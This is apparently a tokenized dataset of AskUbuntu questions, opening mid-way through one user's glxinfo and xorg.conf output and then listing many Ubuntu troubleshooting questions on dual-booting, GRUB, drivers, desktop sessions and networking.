, glx_nv_float_buffer , glx_arb_fbconfig_float , glx_ext_framebuffer_srgb , glx_nv_multisample_coverage client glx vendor string : nvidia corporation client glx version string : 1.4 client glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_visual_info , glx_ext_visual_rating , glx_ext_import_context , glx_sgi_video_sync , glx_nv_swap_group , glx_nv_video_out , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgi_swap_control , glx_ext_swap_control , glx_ext_swap_control_tear , glx_ext_buffer_age , glx_arb_create_context , glx_arb_create_context_profile , glx_nv_float_buffer , glx_arb_fbconfig_float , glx_ext_fbconfig_packed_float , glx_ext_texture_from_pixmap , glx_ext_framebuffer_srgb , glx_nv_present_video , glx_nv_copy_image , glx_nv_multisample_coverage , glx_nv_video_capture , glx_ext_create_context_es_profile , glx_ext_create_context_es2_profile , glx_arb_create_context_robustness glx version : 1.4 glx extensions : glx_ext_visual_info , glx_ext_visual_rating , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgi_video_sync , glx_sgi_swap_control , glx_ext_swap_control , glx_ext_swap_control_tear , glx_ext_texture_from_pixmap , glx_ext_buffer_age , glx_arb_create_context , glx_arb_create_context_profile , glx_ext_create_context_es_profile , glx_ext_create_context_es2_profile , glx_arb_create_context_robustness , glx_arb_multisample , glx_nv_float_buffer , glx_arb_fbconfig_float , glx_ext_framebuffer_srgb , glx_nv_multisample_coverage , glx_arb_get_proc_address opengl vendor string : nvidia corporation opengl renderer string : geforce 610m/pcie/sse2 opengl version string : 4.3.0 nvidia 319.32 opengl shading language version string : 4.30 nvidia via cg compiler opengl extensions : gl_amd_multi_draw_indirect , gl_arb_arrays_of_arrays , gl_arb_base_instance , gl_arb_blend_func_extended , gl_arb_clear_buffer_object , gl_arb_color_buffer_float , gl_arb_compatibility , gl_arb_compressed_texture_pixel_storage , gl_arb_conservative_depth , gl_arb_compute_shader , gl_arb_copy_buffer , gl_arb_copy_image , gl_arb_debug_output , gl_arb_depth_buffer_float , gl_arb_depth_clamp , gl_arb_depth_texture , gl_arb_draw_buffers , gl_arb_draw_buffers_blend , gl_arb_draw_indirect , gl_arb_draw_elements_base_vertex , gl_arb_draw_instanced , gl_arb_es2_compatibility , gl_arb_es3_compatibility , gl_arb_explicit_attrib_location , gl_arb_explicit_uniform_location , gl_arb_fragment_coord_conventions , gl_arb_fragment_layer_viewport , gl_arb_fragment_program , gl_arb_fragment_program_shadow , gl_arb_fragment_shader , gl_arb_framebuffer_no_attachments , gl_arb_framebuffer_object , gl_arb_framebuffer_srgb , gl_arb_geometry_shader4 , gl_arb_get_program_binary , gl_arb_gpu_shader5 , gl_arb_gpu_shader_fp64 , gl_arb_half_float_pixel , gl_arb_half_float_vertex , gl_arb_imaging , gl_arb_instanced_arrays , gl_arb_internalformat_query , gl_arb_internalformat_query2 , gl_arb_invalidate_subdata , gl_arb_map_buffer_alignment , gl_arb_map_buffer_range , gl_arb_multi_draw_indirect , gl_arb_multisample , gl_arb_multitexture , gl_arb_occlusion_query , gl_arb_occlusion_query2 , gl_arb_pixel_buffer_object , gl_arb_point_parameters , gl_arb_point_sprite , gl_arb_program_interface_query , gl_arb_provoking_vertex , gl_arb_robust_buffer_access_behavior , gl_arb_robustness , gl_arb_sample_shading , gl_arb_sampler_objects , gl_arb_seamless_cube_map , gl_arb_separate_shader_objects , gl_arb_shader_atomic_counters , gl_arb_shader_bit_encoding , gl_arb_shader_image_load_store , gl_arb_shader_image_size , gl_arb_shader_objects , gl_arb_shader_precision , gl_arb_shader_storage_buffer_object , gl_arb_shader_subroutine , gl_arb_shader_texture_lod , gl_arb_shading_language_100 , gl_arb_shading_language_420pack , gl_arb_shading_language_include , gl_arb_shading_language_packing , gl_arb_shadow , gl_arb_stencil_texturing , gl_arb_sync , gl_arb_tessellation_shader , gl_arb_texture_border_clamp , gl_arb_texture_buffer_object , gl_arb_texture_buffer_object_rgb32 , gl_arb_texture_buffer_range , gl_arb_texture_compression , gl_arb_texture_compression_bptc , gl_arb_texture_compression_rgtc , gl_arb_texture_cube_map , gl_arb_texture_cube_map_array , gl_arb_texture_env_add , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 , gl_arb_texture_float , gl_arb_texture_gather , gl_arb_texture_mirrored_repeat , gl_arb_texture_multisample , gl_arb_texture_non_power_of_two , gl_arb_texture_query_levels , gl_arb_texture_query_lod , gl_arb_texture_rectangle , gl_arb_texture_rg , gl_arb_texture_rgb10_a2ui , gl_arb_texture_storage , gl_arb_texture_storage_multisample , gl_arb_texture_swizzle , gl_arb_texture_view , gl_arb_timer_query , gl_arb_transform_feedback2 , gl_arb_transform_feedback3 , gl_arb_transform_feedback_instanced , gl_arb_transpose_matrix , gl_arb_uniform_buffer_object , gl_arb_vertex_array_bgra , gl_arb_vertex_array_object , gl_arb_vertex_attrib_64bit , gl_arb_vertex_attrib_binding , gl_arb_vertex_buffer_object , gl_arb_vertex_program , gl_arb_vertex_shader , gl_arb_vertex_type_2_10_10_10_rev , gl_arb_viewport_array , gl_arb_window_pos , gl_ati_draw_buffers , gl_ati_texture_float , gl_ati_texture_mirror_once , gl_s3_s3tc , gl_ext_texture_env_add , gl_ext_abgr , gl_ext_bgra , gl_ext_bindable_uniform , gl_ext_blend_color , gl_ext_blend_equation_separate , gl_ext_blend_func_separate , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_compiled_vertex_array , gl_ext_cg_shader , gl_ext_depth_bounds_test , gl_ext_direct_state_access , gl_ext_draw_buffers2 , gl_ext_draw_instanced , gl_ext_draw_range_elements , gl_ext_fog_coord , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_extx_framebuffer_mixed_formats , gl_ext_framebuffer_multisample_blit_scaled , gl_ext_framebuffer_object , gl_ext_framebuffer_srgb , gl_ext_geometry_shader4 , gl_ext_gpu_program_parameters , gl_ext_gpu_shader4 , gl_ext_multi_draw_arrays , gl_ext_packed_depth_stencil , gl_ext_packed_float , gl_ext_packed_pixels , gl_ext_pixel_buffer_object , gl_ext_point_parameters , gl_ext_provoking_vertex , gl_ext_rescale_normal , gl_ext_secondary_color , gl_ext_separate_shader_objects , gl_ext_separate_specular_color , gl_ext_shader_image_load_store , gl_ext_shadow_funcs , gl_ext_stencil_two_side , gl_ext_stencil_wrap , gl_ext_texture3d , gl_ext_texture_array , gl_ext_texture_buffer_object , gl_ext_texture_compression_dxt1 , gl_ext_texture_compression_latc , gl_ext_texture_compression_rgtc , gl_ext_texture_compression_s3tc , gl_ext_texture_cube_map , gl_ext_texture_edge_clamp , gl_ext_texture_env_combine , gl_ext_texture_env_dot3 , gl_ext_texture_filter_anisotropic , gl_ext_texture_integer , gl_ext_texture_lod , gl_ext_texture_lod_bias , gl_ext_texture_mirror_clamp , gl_ext_texture_object , gl_ext_texture_shared_exponent , gl_ext_texture_srgb , gl_ext_texture_srgb_decode , gl_ext_texture_storage , gl_ext_texture_swizzle , gl_ext_timer_query , gl_ext_transform_feedback2 , gl_ext_vertex_array , gl_ext_vertex_array_bgra , gl_ext_vertex_attrib_64bit , gl_ext_x11_sync_object , gl_ext_import_sync_object , gl_ibm_rasterpos_clip , gl_ibm_texture_mirrored_repeat , gl_khr_debug , gl_ktx_buffer_region , gl_nv_blend_square , gl_nv_compute_program5 , gl_nv_conditional_render , gl_nv_copy_depth_to_color , gl_nv_copy_image , gl_nv_depth_buffer_float , gl_nv_depth_clamp , gl_nv_draw_texture , gl_nv_es1_1_compatibility , gl_nv_explicit_multisample , gl_nv_fence , gl_nv_float_buffer , gl_nv_fog_distance , gl_nv_fragment_program , gl_nv_fragment_program_option , gl_nv_fragment_program2 , gl_nv_framebuffer_multisample_coverage , gl_nv_geometry_shader4 , gl_nv_gpu_program4 , gl_nv_gpu_program4_1 , gl_nv_gpu_program5 , gl_nv_gpu_program5_mem_extended , gl_nv_gpu_program_fp64 , gl_nv_gpu_shader5 , gl_nv_half_float , gl_nv_light_max_exponent , gl_nv_multisample_coverage , gl_nv_multisample_filter_hint , gl_nv_occlusion_query , gl_nv_packed_depth_stencil , gl_nv_parameter_buffer_object , gl_nv_parameter_buffer_object2 , gl_nv_path_rendering , gl_nv_pixel_data_range , gl_nv_point_sprite , gl_nv_primitive_restart , gl_nv_register_combiners , gl_nv_register_combiners2 , gl_nv_shader_atomic_counters , gl_nv_shader_atomic_float , gl_nv_shader_buffer_load , gl_nv_shader_storage_buffer_object , gl_nv_texgen_reflection , gl_nv_texture_barrier , gl_nv_texture_compression_vtc , gl_nv_texture_env_combine4 , gl_nv_texture_expand_normal , gl_nv_texture_multisample , gl_nv_texture_rectangle , gl_nv_texture_shader , gl_nv_texture_shader2 , gl_nv_texture_shader3 , gl_nv_transform_feedback , gl_nv_transform_feedback2 , gl_nv_vdpau_interop , gl_nv_vertex_array_range , gl_nv_vertex_array_range2 , gl_nv_vertex_attrib_integer_64bit , gl_nv_vertex_buffer_unified_memory , gl_nv_vertex_program , gl_nv_vertex_program1_1 , gl_nv_vertex_program2 , gl_nv_vertex_program2_option , gl_nv_vertex_program3 , gl_nvx_conditional_render , gl_nvx_gpu_memory_info , gl_sgis_generate_mipmap , gl_sgis_texture_lod , gl_sgix_depth_texture , gl_sgix_shadow , gl_sun_slice_accum $ > less /etc/x11/xorg.conf section `` serverlayout '' identifier `` layout '' screen 0 `` nvidia '' inactive `` intel '' endsection section `` device '' identifier `` nvidia '' driver `` nvidia '' busid `` 1:0:0 '' endsection section `` screen '' identifier `` nvidia '' device `` nvidia '' option `` usedisplaydevice '' `` none '' endsection section `` device '' identifier `` intel '' driver `` modesetting '' endsection section `` screen '' identifier `` intel '' device `` intel '' endsection
343979	failed to dual boot ubuntu 12.04 alongside with windows 8	i had 7 or 8 tries in the past two days to install ubuntu 12.04 on my laptop with windows 8 pre-installed . i encountered a series of problems and i found some of them exist in other versions ( such as ubuntu 13.04 with windows 7 ) systems too . here is a list of problems i had : since i installed ubuntu 12.04 with a live cd , it was n't detecting windows 8 , which i believe it should do . install guide provided two options : erase the hard drive and install ubuntu ; other options . ( sometimes also detecting installed ubuntu system while sometimes not . ) after installing ubuntu , there was no grub menu to choose . and i installed grub-customizer for checking - no entry for windows system as expected apparently for the problem 1 . install and run boot-repair will fix a part of the problem , but there would be 2 possible results : we get both entries for ubuntu and windows 8 , and all seems running well . but after once or twice reboot , computer will show '' no such disk : xxxx grub rescue > '' ; an artical said this happens when enable both efi mode and legacy mode then i switched off legacy mode , which did n't help . here we get an entry for windows in grub menu , but no entry for ubuntu anyway . nvidia-current can not be installed by system recommend for some reasons ( i think ) as lack of source/headers by default , so need to run sudo apt-get install linux-headers-generic to fix ; my laptop has one hard disk ( /dev/sda ) and it 's not possible to install grub2 by additional command /dev/sda ( returns error message ) . and also reports warning `` the boot file is too far from head of disk , your system probably will not detect it '' , then suggests partition for /boot ( which i 'm sure i had such one partition ) . now i removed ubuntu from windows , and encountered `` grub-rescue '' when reboot . then i rebooted and switched on `` secure boot '' , it boots directly into windows now . just for a few more , when installing ubuntu , i had uefi settings as : secure boot : disabled ; legacy support : enabled by default , and disabled it after several tries ; so here are my questions : why ubuntu install system did n't detect windows 8 ? ( it also happens in installing version 13.04 ) how to fix the problem happens with grub ? ( replace it or fix it ? and why it happened ? ) will it be possible to dual boot ubuntu alongside with windows on exactly one disk ? thanks a lot . run `` lsblk '' in `` try ubuntu '' : https : //docs.google.com/file/d/0bww7veh5_yceewhirtdlcwt3yw8/edit ? usp=sharing
343980	kubuntu uefi dual boot with windows 7 failed at installing grub-efi	i want to install kubuntu 13.04 together with windows 7 in uefi mode . i installed windows 7 first , which created the efi boot partition . when it come to installing kubuntu , the installation failed when trying to install grub-efi on sda with the error that grub-efi install to /target/ failed . there is a simliar thread with the same problem but on 12.04 : 12.04.2 failed to install grub-efi to /target/ ..and the solution was to use 12.10 . but i 'm using a newer version of ( k ) ubuntu . any solutions here are highly welcome . update : it also does n't work with just kubuntu on the disk , so it 's definitely not a dual boot issue . solved : i used 12.10 and the installation succeded without any problem except that grub did n't add windows . fix that with boot-repair . i found a kubuntu bug entry which says , that it 's probably a kernel bug in 13.04 .
343981	problem with unity after latest update	you see after the last update all my gui is not working : i do n't have launcher or top panel menu and no window arrows are showed to . i tried to reset unity setting by using dconf-tool and tried to reinstall unity , but nothing helps .
343985	dual boot ubuntu and windows 8 on samsung 530u ( 500gb+24gb )	i have samsung 530u ( model np530u3c-a06cz ) , which has 500gb hdd + 24gb ssd . i would like to have dual boot ubuntu 12.04 + windows 8 , but i do n't know how i can do it . according to my information both ( windows and ubuntu ) should boot from hdd and the 24 gb ssd disc is only for expresscache . but i do n't know : how to install expresscache for windows 81 ( there is no driver to download from samsung support ) how to install both systems without a dvd-rom how to make the disc partition in order to keep the possibility for windows to use expresscache i also want to make a hdd partitioned to 3 parts ( windows , data , ubuntu + ssd ) . is there any way to do that without uninstalling windows ? if not , what 's the correct procedure ? 1i am thinking about expresscache only for windows , ubuntu is fast enough .
343989	full ubuntu flash drive install wo n't boot	so i installed ubuntu ( full version , not live ) onto my 8gb usb flash drive . when i start up my pc though and go through the boot options the flash drive does n't show up as one . i 'm not really sure where to go from here . any help/suggestions would be appreciated .
343993	will installing matlab on ubuntu 12.04 desktop open any ports ?	i was wondering if installing matlab is somehow impacting the security of ubuntu . i am really not an ubuntu geek and do not know if installing matlab on ubuntu will open any ports ? i am not using any firewall , since i am not familiar with it , but use my notebook also in a public wifi . thanks for the suggestions
343996	how can i use a domain to point to my server ?	lets say i have a new domain i just purchased : www.server.domain.com and i want that to access my server from anywhere . at home , my ip is static , 192.168.2.47 , but i dont really know where to go from there . im using ubuntu 13.10 as my server machine .
343997	gnome-shell will not launch ubuntu 13.04	when i log into the gnome session , the shell does not launch . in terminal i get the following : pst007x @ pst007x-serval-professional : ~ $ gnome-shell window manager warning : screen 0 on display `` :0 '' already has a window manager ; try using the -- replace option to replace the current window manager . pst007x @ pst007x-serval-professional : ~ $ how can i find the current window manager ? if i change the window manager will it break unity ? any suggestion ? thanks ubuntu 13.04 64bit gnome 3.8 edit : removed compiz and unity , then gnome-shell worked ... guess it 's a conflict somewhere
343998	using a mouse with two pcs	one running windows 7 , the other ubuntu . i would like to use my laptops ( windows ) keyboard and an external mouse ( wireless , dongle ) to be able to control both . is there any way to do this ?
344003	can i install ubuntu on a separate ssd , after having encrypted my windows 8 drive using truecrypt , without messing up the bootloader ?	i would like to install ubuntu on a fresh ssd that is currently not encrypted . my current system contains ( among others ) an ssd , fully encrypted using truecrypt on which windows 8 is installed . how would i go about installing ubuntu without messing up the truecrypt bootloader ? i noticed there was a somewhat similar question here : can ubuntu be installed on windows 7 drive that is encrypted with truecrypt ? but it does not really answer the question on what to do when there already is a truecrypt bootloader on the mbr . neither does the question how can i dual-boot a truecrypt-encrypted windows 7 and ubuntu 11.10 when both are installed separately on different physical drives ? . i want to avoid issues with bootloaders , i do n't really care which bootloader comes first , as long as i can boot into both systems . i 'm want to be able to do this simply by making the right choices during installation .
344007	automatic deletion of old backups in sublime text	using the disk analyzer to clean some garbage i found some ( automatically made ? ) backups . at least i had n't installed any backup package , so i suppose it must be safe to get rid of the older ones . how can i configure sublime text to keep only the last n-backups ?
344009	how to configure network interfaces on ubuntu in virtual boxes ?	the question how can ubuntu be configured so that you do n't got the `` waiting for network configuration ... '' message at boot if you got more than one adapter ? facts i 've got an untouched ubuntu here in virtual box and in vm-ware workstation . my /etc/network/interfaces file is untouched and i 've activated a nat adapter to use the host systems real network card . additionally i 've activated a host only adapter to be able to use a separate ip for connections between the vm and the host system . deduction i figured out that the interfaces file needs only one gateway entry and this is given trough auto eth0 iface eth0 inet dhcp . so this is the entry for the first network adapter that provides gateway information and so the second configuration has no need for a line called gateway 192.168.1.1 . for me that means the second entry has to look like this : address 192.168.217.131 depending on what the router tells you as network address for the interface configured trough dcp and the second line here is the netmask . in common cases this is netmask 255.255.255 . so the entire `/etc/network/interfaces'-file looks like this : # this file describe the network interfaces available on your system # and how to activate them . for more information see interfaces ( 5 ) . # the loopack network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface inet dhcp auto eth1 iface eth1 inet static address 192.168.217.131 netmask 255.255.255 # no need for gateway here because this is already provided by the dhcp entry . in this example i 've taken the ip address provided by ubuntu 's ^server ( basic ubuntu server ) package what was 192.168.217.130 and increased it by one . now i restart ubuntu and got the message waiting for network configuration ... where ubuntu try to wait for network connection about 2 minutes . i 've had the same on virtual box .
344011	i have no internet connection after upgrading from 12.04 to 12.10	i upgraded ubuntu to 12.10 . it seemed to work fine , except that i get no response from internet . sent ping 8.8.8.8 reply icmp_req=112 ttl=47 time=27.6 ( mnimum time , max time 30.5 ) how can this be repaired ?
344012	ubuntu is not working on windows 8 ( 64-bit ) system	windows 8 ( 64-bit ) system.i downloaded ubuntu and every thing going well and started installing it . ubuntu is successfully installed and rebooted but then i get an error during ubuntu 's boot.the error is : starting windows did n't succeed . the reason may be changing software . to solve this problem : 1 . insert installation disc of windows and reboot pc 2 . choose language settings and click next 3 . use repair if you dont own this disk contact with the administrtor . file : \ubuntu\winboot\wubildr.mbr state : 0xc000007b here i read for many users have the same problem that i have , i think ubuntu is not working on windows 8 ( 64-bit ) system
344013	ubuntu 12.04 update manager failure	does anyone hv a suggestion ? every time i 'm trying to check for updates or update anything , the error below comes up . tried to load older kernels , the problem persist in all of them . e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_doctormo_barry-snapshot_ubuntu_dists_karmic_main_i18n_translation-ro , e : listele de pachete sau fičierul de stare n-au putut fi analizate sau deschise .
344015	sharing older vuze downloads with transmission	i had downloaded some media ( mainly free stuff ) using vuze for windows but now i am using ubuntu as my main system . i want to share my free downloaded files ( as a retribution for the community ) as well as probably some media of my own via bittorrent , however i can not find how to set transmission to share those folders and files . do you know how to do it ? btw . what 's the purpose of seeding and leeching and how can i configure it ?
344023	can uget downloader be used as downloader for firefox without flashgot ?	i use flashgot and know what it can do , but it seems that at least for the moment there 's a problem with the way it works with uget in recognizing the names of videos ( see a comment under here ) . i would like to know if one can use this good downloader with firefox without this addon being involved .
344024	how to mount an iso to a cdrom ubuntu 13.04	i 'm new with ubuntu . i decided today to install the version 13.04 . when i finished installing it , the system did n't recognized my broadcom bcm43227 wifi network card . so i searched online , and i known that i had to install bcmwl-kernel-source from my ubuntu cd . the problem is that i do n't have a cd , but a usb drive with ubuntu ( unetinboot ) . so maybe the only solution is to mount the iso of my usb into media/cdrom ( upgrade software center says that the bcmwl-kernel-source must be in media/cdrom ) . i also found this but i do n't know how to install it http : //www.broadcom.com/docs/linux_sta/hybrid-portsrc_x86_64-v5_100_82_112.tar.gz i hope you can help me !
344025	chrome suddenly works very bad	i was using chrome for years without any problem , suddenly about a week ago some pages stop opening , sometime it takes minutes to load a page and sometimes it does n't load any pages at all . temporally i 'm using firefox , but iâm so use to chrome that i feel like switching from driving a ferrari to driving a bike . what i 've tried : cleaning all cache , cookies , installed extensions . reinstalling chrome mv ~/.config/google-chrome { , .bak }
344027	wifi drivers wont turn on	i 've been trying to get my wifi drivers on my laptop working for a week or so now and every video and thread has not helped me out . i know i need to use sudo apt-get install b43-fwcutter but whenever i type it into terminal , i get : from terminal ... . reading package lists ... done building dependency tree reading state information ... done e : unable to locate package b43-fwcutter a suggestion was to put lspci -vvnn | grep 14e4 in terminal : 09 : ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5755m giga bit ethernet pci express [ 14e4:1673 ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev01 ) sudo apt-get install linux-firmware-nonfree : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-firmware-nonfree .
344029	unity tweak tool - make the launcher fully transparent ?	i want my launcher to be transparent , so i check `` transparency '' in unity tweak tool and ... it 's solid . when i uncheck the transparency button ... it is transparency . i 've made gif to show it clearly . how to make the launcher fully transparent ?
344040	how to change phpmyadmin username from root to something else ?	i ca n't seem to find a resource in the internet that explains how to do this from the command line or phpmyadmin . i 'm using ubuntu server 13.04 in amazon ec2 .
344042	ca n't boot windows ( gives `` repair windows '' option )	i have a few extra hardrvies without anything on them . so about a week ago i created a `` live '' usb to see if my system was compatible . after a week of testing and playing i liked it enough to install it ( ubuntu 13.10 ) and yesterday i installed it to a second hard drive , everything went ok but i think its good to note that ubuntu installer said something along the lines of '' ubuntu did not detect any other operating systems '' however i did have win7 ( 64bit ) installed . i thought nothing of this at the time ( as i am installing to a second drive ) . now i selected the bottom option , created a partition table , partition off 70gbs for `` / '' ( ext4 ) , 8gb for swap ( 80gb drive ) . for boot loader i put it on the same drive as install . i did this because i did not want to interfere with the mbr and windows boot loader i wanted to select it in the f12 menu of my bios ( select the drive too boot from ) i did not want grub to replace wbl for multiple reasons ( i hear its unstable , and refer to letter the above point ) then today , i wanted to boot into windows . i restart the computer , my bios goes to windows ( like i wanted , no os select ) then windows says it needs to repair or start . i have tried both . the repair option goes into a loop of , the boot screen , loading windows files . now start windows ( somehow ) boots me into linux . when linux starts it says it had a error , specifically a crash . also , i can view all my windows files too ! my data is intact ! it is also good to note my specs : evga gt 640 i5 3.1 quad 8gb ram gigabyte mother board w/ 3-d bios 4 drives : 160gb sata ntfswindows ) 80gb sata ntfs ( renders ect ) 80gb sata ext4 ( linux ) 1tb sata ntfs ( games , fraps records ) now it seems while i was trying not to screw up my windows boot loader i seem to have .
344045	how to start service after openvpn connects	i 'm trying to setup deluged to run after openvpn makes a connection to my vpn . from researching , it looks like there is n't a reliable `` start on '' status with openvpn , so the next solution is to put the startup directly into the .conf file for the openvpn connection . i 've followed how do i run a script after openvpn has connected successfully ? trying to initialize the server after openvpn connects , but so far , nothing has worked . my openvpn.conf file is as follows client dev tun proto udp remote 108.59.8.142 443 remote-random resolv-retry infinite nobind ns-cert-type server cipher aes-256-cbc comp-lzo verb 3 explicit-exit-notify 5 ca `` ca.crt '' cert `` user.crt '' key `` user.key '' at the bottom , i 've tried the following script-security 2 up /usr/sbin/service deluged start down /usr/sbin/service deluged stop i 've also tried script-security 2 up `` /usr/sbin/service deluged start '' down `` /usr/sbin/service deluged stop '' but both times , if i cycle the openvpn connection , the deluged service fails to start . i can run service deluged start/stop from prompt directly , and it runs fine what am i missing ? ( running ubuntu 12.10 )
344047	wake-on-lan works with windows 8 but not with ubuntu	i have a pc that has a windows 8 partition and an ubuntu 13.04 partition . i am trying to get wake-on-lan to work . everything works fine on the windows 8 partition : i can wake-on-lan from both the sleep state and the shutdown state . however , when i shutdown ubuntu using : sudo shutdown -h now i can not wake the pc through my lan . is this because the network interface is getting turned off ? what command can i use or how can i reconfigure ubuntu so that wake-on-lan still works ? also , if i do not use the -h option in the shutdown command , the pc does not actually shutdown ; it just freezes up on me . using ethtool , i found that it says : supports wake-on : pumbg wake-on : g ... link detected : yes my etc/network/interfaces says this : auto eth0 iface eth0 inet dhcp up ethtool -s eth0 wol g edit : i have found that if i shut down the pc by simply holding the power button , then wol works . if i shutdown using the command line or through the ubunutu gui , then it does not work . so i think the issue is not that it is not being setup properly , but that something is overriding it or shutting it off when i shut down properly . are there are any scripts that get run at shutdown ? i have added netdown=no to both etc/default/halt and etc/init.d/halt
344049	setting up remote access through landscape	i have read about using landscape like a vnc program and i want to access my home computer through the university pc , which runs ubuntu 12.04 . i have read that i need to add my home pc as remote desktop in landscape website . although i am asked for a server url , which i do n't know exactly what is . my home computer is connected in the web router through wireless and i use dynamic ip , and i think i should set up a static ip for that , and i do n't know how to do it , already tried through ifup command , editing interfaces file , although i did n't managed to accomplish that .
344059	how to prevent openjdk-6-jre-headless from clobbering oracle jdk installation ?	my automated build server runs a job that depends on apache ant . the script invokes apt-get install ant . ant depends on openjdk-6-jre-headless which runs update-alternatives making itself the default jdk ( rewriting my symbolic links in the process ) . i already had oracle jdk ( manually ) installed and do not wish update-alternatives to be run . i can not manually restore update-alternatives every time this happens . someone tried to have this corrected last year but was shot down : http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=678195 how do i prevent openjdk-6-jre-headless from invoking update-alternatives or , worse case scenarion , how do i look up the value before the installation process and restore it after-the-fact ? update : i filed a new bug report here . i would appreciate your support .
344060	how to change default system updates folder in ubuntu 12.04 lts ?	hi i am running ubuntu 12.04 lts on my dell inspiron 15r ( dual booting with windows 8 ) . during installation , i had set aside 6gb for my root folder , 8gb for swap and about 20+ gb ( do n't remember exact figure ) for my home folder which ic currently largely empty . recently , i have been receiving consistent system alerts stating that i am running out of disk memory for installing further system updates . how is this possible ? are my updates being installed in my `` root '' instead of `` home '' . how can i fix this ? thanks in advance : ) i use bleachbit to clean memory time-to-time . however , i keep receiving these updates which eat up all the space and give the low-memory warning even though i have 20+gb memory space in my home folder ! how can i manage this ? is it safe to delete old kernel modules ? how can i locate and remove packages that are no longer needed or not being used ?
344064	`` psycopg2.operationalerror : could not connect to server : connection refused '' error when bootstrapping	after the successful import of the ssh keypairs , the bootstrap generates this error . can anyone help me ? connection_factory=connection_factory , async=async ) psycopg2.operationalerror : could not connect to server : connection refused is the server running on host `` localhost '' ( 127.0.0.1 ) and accepting tcp/ip connections on port 5432 ? i have tried : ensuring postgresql is installed and running via : 'sudo service postgresql start` this errors appears how i running 'sudo apt-get update ' .
344066	i want pidgin links opened in chromium not in firefox	when i attempt to open a link in pidgin it opens the link with firefox . i prefer chromium . i have chromium set as the default application in the system settings folder , but firefox still opens the links . can anyone help ?
344067	how to prevent unity from auto-mounting and locking my camera so gphoto2 can work ?	whenever i plug in my canon camera via usb , it gets locked , so when i run gphoto2 , i get : error ( -60 : 'could not lock the device ' ) weeks ago , when i first connected the camera , a dialog asked me , `` what to do when a medium with photos is mounted ? '' and i selected , `` do nothing . '' but still the camera gets locked . once it 's locked , and a camera icon appears in the unity left-side icon bar , i can right-click it and choose `` unmount . '' then gphoto2 can connect to the camera . but it would be better if the camera did n't get locked immediately on connection . any advice appreciated . if it matters , the gphoto2 command i 'm running is : $ gphoto2 -p -t
344070	not giving me the `` try ubuntu '' option	i have created a bootable usb for 12.04 and i placed it in my computer and elected it to boot from flash drive but it is only giving me the option to install and not to try what can i do to get the try it option
344072	i am not able to copy files into remote computer	i am using ubunt 12.04 lts . i connected to windows 2008 server through remmina remote desktop client . i am not able to copy files from my system to client system .
344076	netextender vpn 6.0 works momentarily then remote hosts timeout	my company uses netextender 6.0 . i successfully installed it on ubuntu 12.04 lts , which included manually symlinking an libssl and libcrypto libraries , as well as disabling avahi daemon . now , i can log into the vpn successfully . once logged in , i can ping a host and/or load a web page on the corporate network - but only for a few seconds . then all pings stop working / web pages time out . what is going on - how can i get this resolved ?
344077	cant open /dev/sr0 no medium found : revisted	i have the same problem as this post explains : usb boot problems laptop model is toshiba satellite the problem is : i created a bootable usb stick using unetbootin ( i tried with universal usb creator also ) and after selecting try ubuntu before installing i am getting the following error : cant open /dev/sr0 no medium found i tried the fix that was suggested in the above post . so before , my grub boot options were : setparams 'try ubuntu without installing' set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz i modified the above options by selecting the 'e ' key in the boot menu to this : setparams 'try ubuntu without installing' set gfxpayload=keep linux /casper/vmlinuz.efi live-media-path=/casper/ boot=casper quiet splash ignore_uuid acpi=off nomodeset -- initrd /casper/initrd.lz acpi=off and nomodeset was added to fix the graphics problem . even after adding the lve-media-path i am getting the error . can somebody please help me to fix the problem ? thanks : )
344078	setting up an ubuntu partition on a mac	look , i 'm trying to set up a linux partition on my macbook pro . i did exactly like what everybody says : i partitioned the hard drive , downloaded refit , and installed that . then , i burned ubuntu to a disc , which i put into my laptop , and rebooted . the refit boot loader came up , but without linux ; it had a windows option now . thinking maybe they just misclassified it , i clicked on that , which black-screened me . i rebooted . this time , refit did n't even come up ; it just went straight to os x . every time after that , i ca n't get refit to come back . it wo n't come up . i 've re-downloaded it multiple times , but it does n't seem to work . anyone got a fix ?
344086	install ubuntu 13.04 from ubuntu 10.04	i use windows 7 and ubuntu 10.04 ( dual boot ) . two days ago i download ubuntu 13.04 from ubuntu 's website and try to install inside windows using wubi.exe . but there is no choice for `` install inside windows '' , there is only one choice `` demo and full installation '' . so i decide to upgrade my older version 10.04 to 13.04 . now problem is my pen drive not working so there is any other way to upgrade 10.04 to 13.04 from its iso file , without pen drive or cd rom ? i do not wish to upgrade from `` upgrade manager ''
344088	how to ensure wine does not auto run .exe files ?	i want to install wine only for running a program , but i do n't want to open any other windows file ( for security ) . is it possible to ensure wine does not execute .exe files automatically ? thank you .
344089	how to install xfce 4.12 on ubuntu 12.04	as per the question , how can i install xfce 4.12 on ubuntu 12.04 lts ( 32-bit ) . i tried this ppa https : //launchpad.net/~xubuntu-dev/+archive/xfce-4.12 but there werent any upgrade packages after updating the repository .
344090	i removed compiz and now i ca n't login to ubuntu	i installed compiz a while ago and at some point to decided to remove it . i did that through ubuntu software center , rebooted the system and was n't able to `` login '' since it said something like `` ca n't start ubuntu session '' . how do i repair the system or make it work somehow ? p.s . i have a bootable usb flash with ubuntu 13.04 . and i can to connect to the internet through wifi , but i need : choose a network manually and enter the password ( it might depends on some parameters , but anyway ) open any url address so that that wifi spot redirects me to its default page where i have to press a button like `` enter '' , after that it redirects me to its default page again and eventually i 'll be able to use the internet normally . will it help me ?
